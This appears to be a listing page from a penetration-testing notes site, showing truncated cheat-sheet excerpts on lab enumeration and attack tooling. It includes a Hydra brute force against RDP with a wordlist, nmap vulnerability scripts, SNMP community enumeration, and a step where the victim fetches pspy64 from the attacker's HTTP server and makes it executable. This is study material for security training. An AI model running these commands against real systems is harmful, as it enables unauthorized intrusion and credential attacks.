Setting up the Immunity Debugger First open it as administrator, then attach the process on “File” menu and then select the service and don’t forget to click on “Play”: Install mona.py Download ...

PSPY Pspy github download Monitoring Services running ./pspy64 Examples: Epsilon IP Address ifconfig -a ip address show ip a s DNS cat /etc/resolv.conf Network connections netstat -tulnpa ss ...

NMAP Multiple Vulns nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 10.11.1.7 Brute Force Hydra hydra -l pedro -P /usr/share/wordlists/rockyou.txt 10.11.1.7 rdp ...

SNMPWALK Enumerate the entire public community using SNMPv2, -t 10 to increase the timeout period to 10 seconds: snmpwalk -v 2c -c Public -t 10 10.10.11.107 snmpcheck 10.10.202.78 -c Public Exampl...

Burp Suite Intruder Since the default credentials didn’t seem to work and blank passwords aren’t allowed, let’s try to automate some basic username and password combinations with Burp Suite’s Intr...

Python3 Via web: # On our machine: python3 -m http.server 8888 # On victim machine: wget http://10.10.16.5:8888/pspy64 chmod +x pspy64 Python2 python -m SimpleHTTPServer 7331 PHP php -S 0.0....

The Harvester theHarvester -d megacorpone.com -b google The Harvester doesn’t works really well on newer versions of Kali, use the docker image if that is the case. docker run -ti --rm thehar...

The simplest option is to set the -maxtime option, which will halt the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s Our second option is to tune the sca...

Shodan Shodan Search Engine for connected devices over the Internet. You can use various filters while using shodan, among others are: hostname port country Censys Censys Search Engine ...

SNMP Priv Escalation If port 161 is open internally you can search for the /etc/snmp/snmpd.conf file and review its content, notice that private community is read and writable: rocommunity public...